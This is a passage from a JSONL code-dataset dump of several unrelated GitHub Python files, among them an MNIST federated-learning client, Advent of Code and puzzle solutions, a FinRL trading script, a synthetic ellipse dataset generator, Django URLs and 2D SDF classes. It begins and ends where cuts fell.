s[i])\n","repo_name":"hyotaime/PS.py","sub_path":"Bronze/Bronze1/8620.py","file_name":"8620.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"18308955883","text":"import torch\nimport torch.nn as nn\nfrom torchvision import datasets\nfrom torchvision import transforms\nfrom torchsummary import summary\nfrom tqdm import tqdm\nimport numpy as np\nimport os\nimport time\nimport argparse\n\n# self modules\nimport models\n\n\nclass clientInstance():\n def __init__(self, batchSize=1024, lr=1e-3, epochs=1, device=None, datasetName=None):\n self.setBatchSize(batchSize)\n self.setLearningRate(lr)\n self.setEpochs(epochs)\n self.setDevice(device)\n # set once or we can change these ??\n self.setDatasetName(datasetName)\n self.setDataLoader()\n self.setModel()\n self.setLossAndOpt(self.Net)\n \n def setBatchSize(self, batchSize):\n self.batchSize = batchSize\n \n def setLearningRate(self, lr):\n self.lr = lr\n \n def setEpochs(self, epochs):\n self.epochs = epochs\n \n def setDevice(self, device):\n if device==None: self.device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n else: self.device =device\n\n def setDatasetName(self, datasetName):\n self.DatasetName = datasetName\n\n def setDataLoader(self, datasetName=None):\n transform = transforms.ToTensor()\n if datasetName == None: self.DatasetName = \"lenet\"\n if datasetName == None: train_dataset = datasets.MNIST(root=\"./data\", train=True, download=True, transform=transform)\n train_loader = torch.utils.data.DataLoader(dataset=train_dataset, batch_size = self.batchSize, shuffle=32, num_workers = 2)\n if datasetName == None: test_dataset = datasets.MNIST(root=\"./data\", train=False, download=True, transform=transform)\n test_loader = torch.utils.data.DataLoader(dataset=test_dataset, batch_size = self.batchSize, shuffle=32, num_workers = 2)\n self.train_dataset, self.test_dataset, self.train_loader, self.test_loader = train_dataset, test_dataset, train_loader, test_loader\n\n def setModel(self, model=models.LeNet()):\n Net = model\n Net = Net.to(self.device)\n summary(Net, self.train_dataset[0][0].shape)\n self.Net = Net\n \n def setLossAndOpt(self, net):\n # Loss and Optimizer\n loss_func = nn.MSELoss()\n optimizer = torch.optim.Adam(net.parameters(), lr=self.lr, weight_decay = 1e-8)\n self.loss_function, self.optimizer = loss_func, optimizer\n \n def setParameters(self, stateDict):\n self.Net.load_state_dict(stateDict)\n \n def getParameters(self):\n return self.Net.state_dict()\n \n # train and return parameters\n def train(self, epochs=1, delaytime=0):\n self.train_elastic(self.Net, self.train_loader, self.optimizer, self.loss_function, epochs)\n time.sleep(delaytime)\n return self.Net.state_dict()\n\n def train_elastic(self, net, train_loader, optimizer, loss_function, epochs=1):\n print(\"Client Go Training.\")\n net.train()\n for epoch in range(epochs):\n with tqdm(train_loader, unit=\"batch\") as loader_t:\n for batch_idx, (image, label) in enumerate(loader_t):\n image = image.to(self.device)\n label = nn.functional.one_hot(label, 10)\n label = label.to(torch.float)\n label = label.to(self.device)\n\n optimizer.zero_grad()\n output = net(image)\n loss = loss_function(output, label)\n loss.backward()\n optimizer.step()\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch+1,\n batch_idx * len(image),\n len(train_loader.dataset),\n 100. * batch_idx / len(train_loader),\n loss.item()))\n\n if (epoch+1)%20==0 or epoch==epochs-1:\n torch.save(net.state_dict(), \"./{}_{}_{}.pt\".format(os.getpid(), self.DatasetName, epoch+1)) # <------ Store Models\n \n def eval(self):\n self.eval_elastic(self.Net, self.test_loader, self.loss_function)\n \n # not loaded into self.Net\n def eval_fromStateDict(self, stateDict=None):\n if stateDict==None: model = self.Net\n else:\n model = models.LeNet()\n model.to(self.device)\n model.load_state_dict(stateDict)\n\n self.eval_elastic(model, self.test_loader, self.loss_function)\n\n def eval_elastic(self, net, test_loader, loss_function):\n print(\"Client Go Evaluating.\")\n net.eval()\n test_loss = 0\n correct = 0\n\n for (data, label) in test_loader:\n label_onehot = nn.functional.one_hot(label, 10)\n label_onehot = label_onehot.to(torch.float)\n label_onehot = label_onehot.to(self.device)\n data, label = data.to(self.device), label.to(self.device)\n\n with torch.no_grad():\n output = net(data)\n test_loss += loss_function(output, label_onehot).item()\n pred = output.data.max(1)[1] # get the index of the max log-probability\n correct += pred.eq(label.data).cpu().sum()\n\n\n test_loss = test_loss\n test_loss /= len(test_loader) # loss function already averages over batch size\n print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n test_loss,\n correct,\n len(test_loader.dataset),\n 100. * correct / len(test_loader.dataset)))\n\n\ndef getArguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('-u', '--url', type=str, required=False, default=\"localhost\", help='Input the server ip. e.g. 127.0.0.1')\n parser.add_argument('-p', '--port', type=int, required=False, default=8080, help='Input the server port. e.g. 8080')\n parser.add_argument('-d', '--delay', type=int, required=False, default=0, help='Input the delay time (second) of this client. e.g. 5')\n args = parser.parse_args()\n return args\n\nif __name__ == '__main__':\n args = getArguments()\n server_url = \"http://{}:{}\".format(args.url, args.port)\n print(\"Server at {}\".format(server_url))\n # Hyper Parameters\n np.random.seed(41)\n batch_size = 1024\n lr = 1e-3\n epochs = 3\n device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n\n client1 = clientInstance(batch_size, lr, epochs, device)\n mymodel = client1.train(client1.epochs, args.delay)\n\n # evaluate current client's model\n client1.eval()\n # load parameters into model and evaluate (but not change self.Net)\n client1.eval_fromStateDict(mymodel)\n # get Parameters (that can upload for server)\n print(client1.getParameters())\n print(client1.getParameters()['conv1.weight'])","repo_name":"3chdog/AsynchronousFL-Simulator","sub_path":"client/client_instance.py","file_name":"client_instance.py","file_ext":"py","file_size_in_byte":6835,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"42411415220","text":"from collections import defaultdict\r\n\r\nwith open(\"day_6.in\") as puzzle_input:\r\n fish_all = puzzle_input.read().split(\",\")\r\n lantern_fish = defaultdict(int)\r\n\r\n for fish in fish_all:\r\n lantern_fish[int(fish)] = fish_all.count(fish) # each timer has its own num of occurances\r\n\r\nfor _ in range(256):\r\n new_lantern = defaultdict(int) # temp dict containing new timers\r\n\r\n for timer in lantern_fish:\r\n if timer != 0: new_lantern[timer - 1] += lantern_fish[timer] # each timer is substracted by 1 and added to the new dict\r\n else:\r\n new_lantern[6] += lantern_fish[timer] # rn, the timer of each fish is being reset\r\n new_lantern[8] = lantern_fish[timer] # rn, we add a new timer of the currently created fish\r\n\r\n lantern_fish = new_lantern\r\n\r\nprint(sum(new_lantern.values()))","repo_name":"Mike920-dev/advent-of-code-2021","sub_path":"day 6/day6_2.py","file_name":"day6_2.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"44178683259","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport datetime\nimport os\nfrom finrl import config as config_finrl\n\n#from finrl.finrl_meta.env_stock_trading.env_stocktrading import StockTradingEnv\n#from finrl.drl_agents.elegantrl.models import DRLAgent as DRLAgent_erl\n\nfrom Model.elegantrlAgent import DRLAgent as DRLAgent_erl\nfrom Model.stablebaselines3 import DRLAgent as DRLAgent_stablebaselines\nfrom Model.rllib import DRLAgent as DRLAgent_rllib\n\n\nfrom finrl.finrl_meta.preprocessor.preprocessors import FeatureEngineer, data_split\nfrom finrl.finrl_meta.data_processor import DataProcessor\nfrom Model.enviroment import StockTradingEnv\n\nfrom finrl.plot import backtest_stats, backtest_plot, get_daily_return, get_baseline\nfrom pprint import pprint\nimport sys\nsys.path.append(\"../FinRL-Library\")\nimport itertools\nimport numpy as np\nimport os\nimport gym\n\nfrom Utils.utils import read_yaml, df_to_array\n\ndef train_elegantrl(config):\n # Load data\n processed = pd.read_csv(config['DATA_PATH'])\n processed = processed.sort_values(['date','tic'])\n \n for scenario in config['SCENARIOS']:\n begin_trade, end_trade = config['PERIODS'][scenario]\n train = data_split(processed, config['BEGIN_DAY'], begin_trade) #yyyy-mm-dd\n trade = data_split(processed, begin_trade, end_trade)\n # Process data\n\n for agent_name in config['AGENTS']:\n\n env = StockTradingEnv\n \n train_price_array, train_tech_array, train_turbulence_array = df_to_array(train, tech_indicator_list= config_finrl.TECHNICAL_INDICATORS_LIST, if_vix= True)\n \n agent = DRLAgent_erl(env = env,\n price_array = train_price_array,\n tech_array=train_tech_array,\n turbulence_array=train_turbulence_array,\n config = config)\n model = agent.get_model(agent_name, model_kwargs = config['ERL_PARAMS'])\n\n trained_model = agent.train_model(model=model,\n cwd=config[\"TRAINED_MODEL_FOLDER\"] + scenario + '/' + agent_name,\n total_timesteps=config['BREAK_STEP'])\n\ndef train_stable_baselines(config):\n # Load data\n processed = pd.read_csv(config['DATA_PATH'])\n processed = processed.sort_values(['date','tic'])\n for scenario in config['SCENARIOS']:\n begin_trade, end_trade = config['PERIODS'][scenario]\n train = data_split(processed, config['BEGIN_DAY'], begin_trade) #yyyy-mm-dd\n trade = data_split(processed, begin_trade, end_trade)\n # Process data\n for agent_name in config['AGENTS']:\n\n agent = DRLAgent_stablebaselines(df = train, env = StockTradingEnv, config = config)\n model = agent.get_model(agent_name, model_kwargs = config['SB3_PARAMS'])\n\ndef train_rllib(config):\n # Load data\n processed = pd.read_csv(config['DATA_PATH'])\n processed = processed.sort_values(['date','tic'])\n \n for scenario in config['SCENARIOS']:\n begin_trade, end_trade = config['PERIODS'][scenario]\n train = data_split(processed, config['BEGIN_DAY'], begin_trade) #yyyy-mm-dd\n trade = data_split(processed, begin_trade, end_trade)\n # Process data\n\n for agent_name in config['AGENTS']:\n\n env = StockTradingEnv\n \n train_price_array, train_tech_array, train_turbulence_array = df_to_array(train, tech_indicator_list= config_finrl.TECHNICAL_INDICATORS_LIST, if_vix= True)\n \n agent = DRLAgent_rllib(env = env,\n price_array = train_price_array,\n tech_array=train_tech_array,\n turbulence_array=train_turbulence_array,\n config=config)\n model, model_config = agent.get_model(agent_name)\n\n trained_model = agent.train_model(model=model,\n model_name=agent_name,\n cwd = config[\"TRAINED_MODEL_FOLDER\"] + scenario + '/' + agent_name,\n model_config=model_config)\n\n\nif __name__ == \"__main__\":\n config_path = \"config.yaml\"\n config = read_yaml(config_path)\n if config['RLLIB'] == \"elegantrl\":\n train_elegantrl(config)\n elif config['RLLIB'] == \"stable_baselines\":\n train_stable_baselines(config)\n elif config['RLLIB'] == \"ray\":\n train_rllib(config)\n else:\n raise ValueError(\"Please choose elegantrl or stable_baselines or ray\")","repo_name":"manhkhanhad/AlgorithmicTrading","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4680,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"36"} +{"seq_id":"16703857248","text":"import torch\nfrom utils.tools import normalize, visualize, GaussianSmoothing\nimport os\nimport math\nfrom random import uniform\nfrom utils.Functions import GaussianSmoothing, save_tensor_image_as_png,save_tensor_image_as_png_gray\nfrom matplotlib import pyplot as plt\nfrom math import pi\nimport numpy as np\nfrom shapely.geometry.polygon import LinearRing\nos.system('mkdir warp_set')\nos.system('mkdir warp_set/diseased')\nos.system('mkdir warp_set/healthy')\n\n\nsmoothing = GaussianSmoothing(1, 3, 2, dim=2)\ninput=torch.ones(1,2,256,256)\n\n\ncount=0\nx1 = np.linspace(0, 256, 256, endpoint=False)\nx2 = np.linspace(0, 256, 256, endpoint=False)\nfor num in range(4000):\n if count<20: #create a dataset of 2000 images\n tensor=torch.zeros(2000,2000)\n tensor2 = torch.zeros(2000, 2000)\n K = torch.zeros((2, 256, 256))\n f1 = uniform(0.2, 0.35)\n f2 = uniform(0.35, 0.5)\n h1= uniform(0.2, 0.4); h2= uniform(0.2, 0.4)\n\n #Centers of ellipses:\n u = np.array(torch.randint(50, 200, (1,)));\n v = np.array(torch.randint(50, 200, (1,))) # Center of ellipse 1\n u2 = np.array(torch.randint(50, 200, (1,)));\n v2 = np.array(torch.randint(50, 200, (1,))) # Center of ellipse2\n dist=np.sqrt((u-u2)**2+(v-v2)**2)\n\n#-----------------------------------------------------------------------------------------------\n# add Background\n#-----------------------------------------------------------------------------------------------\n if dist>120: #the ellipses should not be too close to each other, such that they do not intersect\n\n theta = np.linspace(0, 2 * np.pi, 10000)\n for r in range(500):\n cord1 = r * np.cos(theta)+u #cord1 and cord2 are the coordinates on a circle\n cord2 = r * np.sin(theta)+v\n tensor[cord2,cord1] =math.sin(r*f1)*h1 #background in concentric waves c1\n\n tensor=tensor[:256,:256]\n\n\n for r in range(500):\n cord3 = r * np.cos(theta) + u2 #cord3 and cord4 are the coordinates on a circle\n cord4 = r * np.sin(theta) + v2\n tensor2[cord3, cord4] = math.sin(r *f2) * h2 #background in concentric waves c2\n\n tensor2=tensor2[:256,:256]\n\n tensor3=tensor+tensor2 #for the background, the concentric waves c1 and c2 are added\n tensor4=tensor3.clone()\n\n\n# -----------------------------------------------------------------------------------------------------------\n #add ellipse 1\n# -----------------------------------------------------------------------------------------------------------\n\n angle=uniform(0, 2*np.pi) #random rotation angle\n R =torch.tensor( [[np.cos(angle), -np.sin(angle)], #rotation matrix\n [np.sin(angle), np.cos(angle)]])\n\n d1 =int( np.round(np.random.normal(5, 0.7, 1))) #contour thickness g for ellipse 1\n\n mua, sigmaa =40, 1; mub, sigmab =20, 1; # mean and standard deviation of axes of e1\n a = np.random.normal(mua, sigmaa, 1) #first axis of e1\n b = np.random.normal(mub, sigmab, 1) #second axis of e1\n\n t = np.linspace(0, 2*pi, 1000)\n\n for i in range(d1):\n\n x=(a-i)*np.cos(t)\n y=(b-i)*np.sin(t)\n C=torch.tensor([x,y])\n rCoords = torch.mm(R,C)\n xr = np.array(rCoords[0,:])\n yr = np.array(rCoords[1,:])\n\n e1=np.round(xr+u); e2=np.round(yr+v)\n if e1.max()<256 and e2.max()<256:\n tensor3[e1, e2] = 1\n\n\n#--------------------------------------------------------------------------------------------------\n #add ellipse 2\n# --------------------------------------------------------------------------------------------------\n\n mua2, sigmaa2 =70, 1; mub2, sigmab2 =35,1; # mean and standard deviation of e2\n a2 = np.random.normal(mua2, sigmaa2, 1) #first axis of e2\n b2 = np.random.normal(mub2, sigmab2, 1) #first axis of e2\n angle2=uniform(0, 2*np.pi) #random rotation angle\n R =torch.tensor( [[np.cos(angle2), -np.sin(angle2)], #Rotation matrix\n [np.sin(angle2), np.cos(angle2)]])\n t = np.linspace(0, 2*pi, 1000)\n\n d2 =int( np.round(np.random.normal(5, 0.7, 1))) # contour thickness of e2\n\n for i in range(d2):\n\n x2=(a2-i)*np.cos(t)\n y2=(b2-i)*np.sin(t)\n C2=torch.tensor([x2,y2])\n rCoords = torch.mm(R,C2)\n xr2 = np.array(rCoords[0,:])\n yr2 = np.array(rCoords[1,:])\n\n\n e12=np.round(xr2+u2); e22=np.round(yr2+v2)\n if e12.max()<256 and e22.max()<256:\n tensor3[e12,e22]=1\n tensor4[e12, e22] = 1\n\n#-----------------------------------------------------------------------------------------------\n #Check whether ellipses intersect\n# -----------------------------------------------------------------------------------------------\n\n def ellipse_polyline(ellipses, n=100):\n t = np.linspace(0, 2*np.pi, n, endpoint=False)\n st = np.sin(t)\n ct = np.cos(t)\n result = []\n for x0, y0, a, b, angle in ellipses:\n angle = np.deg2rad(angle)\n sa = np.sin(angle)\n ca = np.cos(angle)\n p = np.empty((n, 2))\n p[:, 0] = x0 + a * ca * ct - b * sa * st\n p[:, 1] = y0 + a * sa * ct + b * ca * st\n result.append(p)\n return result\n\n def intersections(a, b):\n ea = LinearRing(a)\n eb = LinearRing(b)\n mp = ea.intersection(eb)\n\n x = [p.x for p in mp]\n y = [p.y for p in mp]\n return x, y\n\n ellipses = [(u, v, a, b, angle*180/np.pi), (u2, v2, a2, b2, angle2*180/np.pi)]\n a3, b3 = ellipse_polyline(ellipses)\n x3, y3 = intersections(a3, b3)\n\n\n if len(x3)==0 and e2.max()<256 and e1.max()<256 and e12.max()<256 and e22.max()<256: #check whether the ellipses do not intersect and are inside the image\n\n T=smoothing(tensor3[None,None,:,:])\n\n #diff=T-smoothing(tensor3[None, None, :, :])\n\n K[0, :, :] = T[0,0,:,:]\n K2=K[None,...]\n X=K2[:,:1,:,:]\n count +=1\n print(count, 'count')\n plt.figure(1)\n plt.plot(T[0,0,...])\n plt.axis('off')\n\n# -----------------------------------------------------------------------------------------\n # Apply Deformation Field to generate diseased images\n # -----------------------------------------------------------------------------------------\n\n def logpdf(x, mu, sigma):\n return -0.5 * (x - mu) * (x - mu) / (sigma * sigma) - 0.5 * torch.log(2 * math.pi * sigma * sigma)\n def gaus2d(x=0, y=0, mx=0.4, my=0.4, sx=0.19, sy=0.19):\n return 1. / (2. * np.pi * sx * sy) * torch.exp(-((x - mx)**2. / (2. * sx**2.) + (y - my)**2. / (2. * sy**2.)))\n\n mu=torch.tensor(0)\n sigma=torch.tensor(0.1)\n\n # create meshgrid\n n =256\n\n x = torch.tensor(np.linspace(-1, 1,n)).float()\n y = torch.tensor(np.linspace(-1, 1,n)).float()\n x, y = torch.tensor(np.meshgrid(x, y))\n grid=torch.cat((x.unsqueeze(-1),y.unsqueeze(-1)), dim=2).unsqueeze(0)\n x.requires_grad = True\n y.requires_grad = True\n mv=torch.tensor(2*(u/256)-1).float()\n mu=torch.tensor(2*(v/256)-1).float()\n\n z=gaus2d(x,y, mx=mu, my=mv)\n\n\n # this line will compute the gradients\n torch.autograd.backward([z], [torch.ones(x.size()), torch.ones(y.size())])\n\n\n plt.figure(4) #Quiver plot of the deformation field\n plt.quiver(x.detach(), y.detach(), -x.grad, -y.grad, z.detach(), alpha=.9)\n plt.axis('off')\n plt.show()\n\n g1=(-x.grad)\n g2=(-y.grad)\n disp2=torch.cat((g1[None,...,None], g2[None,...,None]), 3).float()\n disp2[disp2 != disp2] = 0\n print('disp2')\n vgrid = grid + disp2 / disp2.max() * 0.1\n\n output = torch.nn.functional.grid_sample(X, vgrid)\n\n Out=torch.tensor(output[0,0,:,:].detach().numpy())\n\n diff = -X[0,0,:,:]+ Out\n\n\n X = normalize(X)\n plt.figure(1)\n plt.subplot(1, 3, 1)\n plt.imshow(X[0, 0, :, :])\n plt.title('input healthy')\n plt.axis('off')\n plt.subplot(1, 3, 2)\n output = normalize(Out)\n plt.subplot(1, 3, 2)\n plt.imshow(Out)\n plt.title('output diseased')\n plt.axis('off')\n plt.subplot(1, 3, 3)\n plt.imshow((-diff), cmap='viridis')\n plt.title('Differenz')\n plt.axis('off')\n plt.show()\n print('done')\n#------------------------------------------------------------------------------------------------\n#Save generated images\n#------------------------------------------------------------------------------------------------\n if count<2000: #save 2000 images of healthy subjects\n K[0, :, :] = X[0, 0, :, :]\n K[1, :, :] = diff #Ground Truth difference\n np.save( os.path.join('./warp_set/healthy', str(num)),K)\n\n else: #save 2000 images of diseased subjects\n K[0, :, :] = Out\n K[1, :, :] = diff #Ground Truth difference\n np.save( os.path.join('./warp_set/diseased', str(num)),K)\n","repo_name":"JuliaWolleb/DeScarGAN","sub_path":"create_synthetic_dataset.py","file_name":"create_synthetic_dataset.py","file_ext":"py","file_size_in_byte":9653,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"36"} +{"seq_id":"73192380905","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.api_overview, name='api-overview'),\n path('fact-list/', views.fact_list, name='fact-list'),\n path('fact-detail//', views.fact_detail, name='fact-detail'),\n path('fact-create/', views.fact_create, name='fact-create'),\n path('fact-update//', views.fact_update, name='fact-update'),\n path('fact-delete//', views.fact_delete, name='fact-delete'),\n path('fact-random/', views.fact_random, name='fact-random')\n]\n","repo_name":"ameykasbe/fact-football","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"36"} +{"seq_id":"28069104562","text":"# 퍼즐 조각 채우기\n# https://programmers.co.kr/learn/courses/30/lessons/84021\nimport copy\n\n\ndef dfs(graph, x, y, position, n, num):\n dx = [-1, 0, 1, 0]\n dy = [0, 1, 0, -1]\n\n ret = [position]\n\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n\n if 0 <= nx < n and 0 <= ny < n and graph[nx][ny] == num:\n graph[nx][ny] = 2\n ret = ret + dfs(graph, nx, ny, [position[0] + dx[i], position[1] + dy[i]], n, num)\n\n return ret\n\n\ndef rotate(graph):\n n = len(graph)\n\n ret = [[0] * n for _ in range(n)]\n\n for i in range(n):\n for j in range(n):\n ret[j][n - 1 - i] = graph[i][j]\n\n return ret\n\n\ndef solution(game_board, table):\n answer = 0\n game_board_copy = copy.deepcopy(game_board)\n\n n = len(game_board)\n block = []\n\n for i in range(n):\n for j in range(n):\n if game_board_copy[i][j] == 0:\n game_board_copy[i][j] = 2\n result = dfs(game_board_copy, i, j, [0, 0], n, 0)[1:]\n block.append(result)\n\n for r in range(4):\n table = rotate(table)\n table_rotate_copy = copy.deepcopy(table)\n\n for i in range(n):\n for j in range(n):\n if table_rotate_copy[i][j] == 1:\n table_rotate_copy[i][j] = 2\n result = dfs(table_rotate_copy, i, j, [0, 0], n, 1)[1:]\n\n if result in block:\n block.pop(block.index(result))\n answer += (len(result) + 1)\n table = copy.deepcopy(table_rotate_copy)\n else:\n table_rotate_copy = copy.deepcopy(table)\n\n return answer\n\n\ngame_board = [\n [1, 1, 0, 0, 1, 0],\n [0, 0, 1, 0, 1, 0],\n [0, 1, 1, 0, 0, 1],\n [1, 1, 0, 1, 1, 1],\n [1, 0, 0, 0, 1, 0],\n [0, 1, 1, 1, 0, 0]\n]\ntable = [\n [1, 0, 0, 1, 1, 0],\n [1, 0, 1, 0, 1, 0],\n [0, 1, 1, 0, 1, 1],\n [0, 0, 1, 0, 0, 0],\n [1, 1, 0, 1, 1, 0],\n [0, 1, 0, 0, 0, 0]\n]\nprint(solution(game_board, table))\n\n# 참조 https://bladejun.tistory.com/164\n# 너무 어렵다\n","repo_name":"hwanginbeom/algorithm_study","sub_path":"WeeklyChallenge/WeeklyChallenge03_wooseok.py","file_name":"WeeklyChallenge03_wooseok.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"36"} +{"seq_id":"4078732140","text":"\"\"\"This file contains some 2D SDFs that are used for the 2D illustrations in the paper.\"\"\"\n\nimport numpy as np\n\nimport drjit as dr\nimport mitsuba as mi\n\n\ndef detach(x, detach_variable=True):\n return dr.detach(x) if detach_variable else x\n\n\nclass SDFBase:\n\n def __init__(self):\n self.step_scale = 1.0\n self.trace_eps = 1e-4\n self.use_weight_ad = True\n self.warpt_normal_offset = dr.opaque(mi.Float, 0.1)\n\n\nclass Grid2d(SDFBase):\n\n def __init__(self, data):\n super().__init__()\n self.shape = mi.Vector2i(np.array(data.shape))\n self.data = mi.Float(data.ravel())\n self.p = mi.Vector2f(0, 0)\n self.texture = mi.Texture2f(data.shape, 1, use_accel=False)\n self.texture.set_tensor(data[..., None])\n\n def eval(self, x, detached=False):\n \"\"\"Queries a 2D image using bspline interpolation\"\"\"\n x = x - detach(self.p, detached)\n if detached:\n with dr.suspend_grad():\n with dr.resume_grad(x):\n return self.texture.eval_cubic(x, force_drjit=True)[0]\n return self.texture.eval_cubic(x, force_drjit=True)[0]\n\n def eval_grad(self, x, detached=False):\n \"\"\"Evaluates the image gradient using bspline interpolation\"\"\"\n x = x - detach(self.p, detached)\n if detached:\n with dr.suspend_grad():\n with dr.resume_grad(x):\n return self.texture.eval_cubic_grad(x)[1][0]\n\n return self.texture.eval_cubic_grad(x)[1][0]\n\n def eval_hessian(self, x, detached=False):\n \"\"\"Evaluates the image hessian using bspline interpolation\"\"\"\n x = x - dr.detach(self.p)\n assert not detached\n return self.texture.eval_cubic_hessian(x)[2][0]\n\n def traverse(self, callback):\n if self.texture is not None:\n callback.put_parameter(\"sdf.data\", self.texture.tensor(), mi.ParamFlags.Differentiable)\n else:\n callback.put_parameter(\"sdf.data\", self.data, mi.ParamFlags.Differentiable)\n\n callback.put_parameter(\"sdf.p\", self.p, mi.ParamFlags.Differentiable)\n\n def parameters_changed(self, keys):\n if self.texture is not None:\n self.texture.set_tensor(self.texture.tensor())\n\n\nclass DiskSDF(SDFBase):\n\n def __init__(self, p, r):\n super().__init__()\n self.p = p\n self.r = r\n\n def eval(self, x, detached=False):\n if detached:\n return dr.norm(x - dr.detach(self.p)) - dr.detach(self.r)\n\n return dr.norm(x - self.p) - self.r\n\n def eval_grad(self, x, detached=False):\n if detached:\n return dr.normalize(x - dr.detach(self.p))\n\n return dr.normalize(x - self.p)\n\n def eval_hessian(self, x, detached=False):\n v = x - (self.p if not detached else dr.detach(self.p))\n n = dr.norm(v)\n g = mi.Vector3f(0.0, 0.0, 0.0)\n\n g.x = 1 / n - 1 / (n * n * n) * v.x * v.x\n g.y = 1 / n - 1 / (n * n * n) * v.y * v.y\n g.z = -1 / (n * n * n) * v.x * v.y\n return mi.Matrix2f([[g.x, g.z], [g.z, g.y]])\n\n\nclass RectangleSDF(SDFBase):\n\n def __init__(self, p, extents, rotation_angle=0, offset=0.015):\n super().__init__()\n self.p = p\n self.extents = extents\n\n # TODO: Support offset and rotation\n # Rotation: rotate points before eval, rotate gradient vector\n self.rotation_angle = rotation_angle\n self.offset = offset\n\n def eval(self, x, detached=False):\n x = x - detach(self.p, detached)\n d = dr.abs(x) - detach(self.extents, detached)\n return dr.norm(dr.maximum(d, 0.0)) + dr.minimum(dr.maximum(d.x, d.y), 0.0) - self.offset\n\n def eval_grad(self, x, detached=False):\n x = x - detach(self.p, detached)\n w = dr.abs(x) - detach(self.extents, detached)\n s = mi.Vector2f(dr.select(x.x < 0.0, -1, 1), dr.select(x.y < 0.0, -1, 1))\n g = dr.maximum(w.x, w.y)\n q = dr.maximum(w, 0.0)\n l = dr.norm(q)\n inner = dr.select(w.x > w.y, mi.Vector2f(1, 0), mi.Vector2f(0, 1))\n return s * dr.select(g > 0.0, q / l, inner)\n\n def eval_hessian(self, x, detached=False):\n return mi.Matrix2f(0.0)\n\n\nclass UnionSDF(SDFBase):\n \"\"\"Allows to add to different SDFs to the same scene\"\"\"\n\n def __init__(self, sdf1, sdf2, smooth=True, k=32):\n super().__init__()\n self.sdf1 = sdf1\n self.sdf2 = sdf2\n self.smooth = smooth\n self.k = k\n\n def eval(self, x, detached=False):\n v1 = self.sdf1.eval(x, detached)\n v2 = self.sdf2.eval(x, detached)\n\n if self.smooth:\n return -dr.log(dr.exp(-self.k * v1) + dr.exp(-self.k * v2)) / self.k\n else:\n return dr.select(v1 < v2, v1, v2)\n\n def eval_grad(self, x, detached=False):\n v1 = self.sdf1.eval(x, detached)\n v2 = self.sdf2.eval(x, detached)\n g1 = self.sdf1.eval_grad(x, detached)\n g2 = self.sdf2.eval_grad(x, detached)\n\n if self.smooth:\n k = self.k\n x0 = dr.exp(-k * v1)\n x1 = k * x0\n x2 = dr.exp(-k * v2)\n x3 = k * x2\n x4 = 1 / (k * (x0 + x2) + 1e-7) # TODO: Is this epsilon here at the right place?\n return mi.Vector2f(-x4 * (-g1.x * x1 - g2.x * x3), -x4 * (-g1.y * x1 - g2.y * x3))\n else:\n return dr.select(v1 < v2, g1, g2)\n\n def eval_hessian(self, x, detached=False):\n v1 = self.sdf1.eval(x, detached)\n v2 = self.sdf2.eval(x, detached)\n h1 = self.sdf1.eval_hessian(x, detached)\n h2 = self.sdf2.eval_hessian(x, detached)\n h1 = mi.Vector3f(h1[0, 0], h1[1, 1], h1[0, 1])\n h2 = mi.Vector3f(h2[0, 0], h2[1, 1], h2[0, 1])\n if self.smooth:\n k = self.k\n g1 = self.sdf1.eval_grad(x, detached)\n g2 = self.sdf2.eval_grad(x, detached)\n x0 = dr.exp(-k * v1)\n x1 = k * x0\n x2 = g1.x * x1\n x3 = dr.exp(-k * v2)\n x4 = k * x3\n x5 = g2.x * x4\n x6 = k ** (-1)\n x7 = x0 + x3 + 1e-7\n x8 = x6 / x7 ** 2\n x9 = x8 * (x2 + x5)\n x10 = k ** 2\n x11 = x0 * x10\n x12 = x10 * x3\n x13 = x6 / x7\n x14 = g1.y * x1\n x15 = g2.y * x4\n x16 = -x14 - x15\n h = mi.Vector3f(-x13 * (g1.x ** 2 * x11 - h1.x * x1 + g2.x ** 2 * x12 - h2.x * x4) - x9 * (-x2 - x5),\n -x13 * (g1.y ** 2 * x11 - h1.y * x1 + g2.y ** 2 * x12 - h2.y * x4) - x16 * x8 * (x14 + x15),\n -x13 * (g1.x * g1.y * x11 - h1.z * x1 + g2.x * g2.y * x12 - h2.z * x4) - x16 * x9)\n else:\n h = dr.select(v1 < v2, h1, h2)\n return mi.Matrix2f([[h.x, h.z], [h.z, h.y]])\n\n\nclass HalfSpaceSDF(SDFBase):\n\n def __init__(self, p):\n super().__init__()\n self.p = p\n\n def eval(self, x, detached=False):\n if detached:\n return (x.x - dr.detach(self.p.x))\n return (x.x - self.p.x)\n\n def eval_grad(self, x, detached=False):\n return mi.Vector2f(1.0, 0.0)\n\n def eval_hessian(self, x, detached=False):\n return mi.Vector3f(0.0, 0.0, 0.0)\n\n\ndef arc_sdf(p, theta=np.pi / 4, phi=-0.4, ra=0.25, rb=0.1):\n sca = np.array([np.cos(theta), np.sin(theta)])\n scb = np.array([np.cos(phi), np.sin(phi)])\n R = np.array([[sca[0], sca[1]], [-sca[1], sca[0]]])\n p = p @ R\n p[:, 0] = np.abs(p[:, 0])\n length = np.sqrt(np.sum(p ** 2, axis=1))\n dotprod = p[:, 0] * scb[0] + p[:, 1] * scb[1]\n k = np.where(scb[1] * p[:, 0] > scb[0] * p[:, 1], dotprod, length)\n return np.sqrt(length ** 2 